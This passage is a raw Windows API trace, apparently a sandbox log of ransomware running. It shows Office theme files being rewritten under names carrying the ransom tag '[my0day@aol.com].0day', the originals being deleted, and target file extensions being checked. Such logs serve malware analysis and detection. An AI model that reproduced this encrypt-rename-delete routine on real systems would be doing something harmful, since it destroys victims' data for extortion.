[0272.108] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.108] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.158] GetLastError () returned 0x0 [0272.158] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x6ae5, lpOverlapped=0x0) returned 1 [0272.162] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x6af0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x6af0, lpOverlapped=0x0) returned 1 [0272.164] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.164] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.164] SetEndOfFile (hFile=0x394) returned 1 [0272.164] CloseHandle (hObject=0x394) returned 1 [0272.164] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.164] SetEndOfFile (hFile=0x3a8) returned 1 [0272.174] CloseHandle (hObject=0x3a8) returned 1 [0272.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx")) returned 1 [0272.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.177] lstrlenW (lpString=".doc") returned 4 [0272.177] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString=".docx") returned 5 [0272.178] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.178] lstrlenW (lpString=".pdf") returned 4 [0272.178] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString=".xls") returned 4 [0272.178] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString=".xlsx") returned 5 [0272.178] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.178] lstrlenW (lpString=".ppt") returned 4 [0272.178] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.178] lstrlenW (lpString=".zip") returned 4 [0272.178] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString=".rar") returned 4 [0272.178] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString=".bz2") returned 4 [0272.178] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString=".7z") returned 3 [0272.178] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.178] lstrlenW (lpString=".dbf") returned 4 [0272.178] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.178] lstrlenW (lpString=".1cd") returned 4 [0272.178] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.179] lstrlenW (lpString=".jpg") returned 4 [0272.179] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.179] lstrlenW (lpString=".doc") returned 4 [0272.179] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString=".docx") returned 5 [0272.179] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.179] lstrlenW (lpString=".pdf") returned 4 [0272.179] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString=".xls") returned 4 [0272.179] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString=".xlsx") returned 5 [0272.179] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.179] lstrlenW (lpString=".ppt") returned 4 [0272.179] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.179] lstrlenW (lpString=".zip") returned 4 [0272.179] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString=".rar") returned 4 [0272.179] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString=".bz2") returned 4 [0272.179] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString=".7z") returned 3 [0272.179] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.179] lstrlenW (lpString=".dbf") returned 4 [0272.179] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.180] lstrlenW (lpString=".1cd") returned 4 [0272.180] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0272.180] lstrlenW (lpString=".jpg") returned 4 [0272.180] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.180] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.180] lstrlenW (lpString="Aspect.eftx") returned 11 [0272.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.181] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=22554) returned 1 [0272.181] CloseHandle (hObject=0x3a8) returned 1 [0272.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx")) returned 0x20 [0272.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.182] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.182] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.182] GetLastError () returned 0x0 [0272.182] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x581a, lpOverlapped=0x0) returned 1 [0272.187] WriteFile (in: hFile=0x380, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x5820, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x5820, lpOverlapped=0x0) returned 1 [0272.189] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.189] WriteFile (in: hFile=0x380, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.189] SetEndOfFile (hFile=0x380) returned 1 [0272.189] CloseHandle (hObject=0x380) returned 1 [0272.189] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.189] SetEndOfFile (hFile=0x3a8) returned 1 [0272.360] CloseHandle (hObject=0x3a8) returned 1 [0272.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx")) returned 1 [0272.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.478] lstrlenW (lpString=".doc") returned 4 [0272.478] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.478] lstrlenW (lpString=".docx") returned 5 [0272.478] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.478] lstrlenW (lpString=".pdf") returned 4 [0272.478] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.478] lstrlenW (lpString=".xls") returned 4 [0272.478] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.478] lstrlenW (lpString=".xlsx") returned 5 [0272.478] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.478] lstrlenW (lpString=".ppt") returned 4 [0272.478] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.478] lstrlenW (lpString=".zip") returned 4 [0272.478] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.478] lstrlenW (lpString=".rar") returned 4 [0272.478] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".bz2") returned 4 [0272.479] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".7z") returned 3 [0272.479] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.479] lstrlenW (lpString=".dbf") returned 4 [0272.479] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.479] lstrlenW (lpString=".1cd") returned 4 [0272.479] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.479] lstrlenW (lpString=".jpg") returned 4 [0272.479] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.479] lstrlenW (lpString=".doc") returned 4 [0272.479] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".docx") returned 5 [0272.479] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.479] lstrlenW (lpString=".pdf") returned 4 [0272.479] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".xls") returned 4 [0272.479] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".xlsx") returned 5 [0272.479] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.479] lstrlenW (lpString=".ppt") returned 4 [0272.479] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.479] lstrlenW (lpString=".zip") returned 4 [0272.479] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".rar") returned 4 [0272.479] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.479] lstrlenW (lpString=".bz2") returned 4 [0272.480] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.480] lstrlenW (lpString=".7z") returned 3 [0272.480] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.480] lstrlenW (lpString=".dbf") returned 4 [0272.480] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.480] lstrlenW (lpString=".1cd") returned 4 [0272.480] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0272.480] lstrlenW (lpString=".jpg") returned 4 [0272.480] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.480] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.480] lstrlenW (lpString="Black Tie.eftx") returned 14 [0272.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.518] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=618119) returned 1 [0272.518] CloseHandle (hObject=0x37c) returned 1 [0272.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx")) returned 0x20 [0272.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.641] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.641] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.642] GetLastError () returned 0x0 [0272.642] ReadFile (in: hFile=0x3a4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x96e87, lpOverlapped=0x0) returned 1 [0272.733] WriteFile (in: hFile=0x354, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x96e90, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x96e90, lpOverlapped=0x0) returned 1 [0272.793] ReadFile (in: hFile=0x3a4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.793] WriteFile (in: hFile=0x354, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.793] SetEndOfFile (hFile=0x354) returned 1 [0272.793] CloseHandle (hObject=0x354) returned 1 [0272.793] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.793] SetEndOfFile (hFile=0x3a4) returned 1 [0272.809] CloseHandle (hObject=0x3a4) returned 1 [0272.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.814] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx")) returned 1 [0272.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString=".doc") returned 4 [0272.815] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString=".docx") returned 5 [0272.815] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.815] lstrlenW (lpString=".pdf") returned 4 [0272.815] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString=".xls") returned 4 [0272.815] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString=".xlsx") returned 5 [0272.815] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.815] lstrlenW (lpString=".ppt") returned 4 [0272.815] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString=".zip") returned 4 [0272.815] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString=".rar") returned 4 [0272.815] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString=".bz2") returned 4 [0272.815] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString=".7z") returned 3 [0272.815] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString=".dbf") returned 4 [0272.815] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString=".1cd") returned 4 [0272.815] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString=".jpg") returned 4 [0272.815] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.815] lstrlenW (lpString=".doc") returned 4 [0272.815] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString=".docx") returned 5 [0272.816] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.816] lstrlenW (lpString=".pdf") returned 4 [0272.816] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString=".xls") returned 4 [0272.816] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString=".xlsx") returned 5 [0272.816] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.816] lstrlenW (lpString=".ppt") returned 4 [0272.816] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.816] lstrlenW (lpString=".zip") returned 4 [0272.816] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString=".rar") returned 4 [0272.816] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString=".bz2") returned 4 [0272.816] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString=".7z") returned 3 [0272.816] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.816] lstrlenW (lpString=".dbf") returned 4 [0272.816] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.816] lstrlenW (lpString=".1cd") returned 4 [0272.816] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0272.816] lstrlenW (lpString=".jpg") returned 4 [0272.816] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.816] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.816] lstrlenW (lpString="Flow.eftx") returned 9 [0272.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.820] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=26648) returned 1 [0272.820] CloseHandle (hObject=0x378) returned 1 [0272.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx")) returned 0x20 [0272.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.828] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.829] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.836] GetLastError () returned 0x0 [0272.836] ReadFile 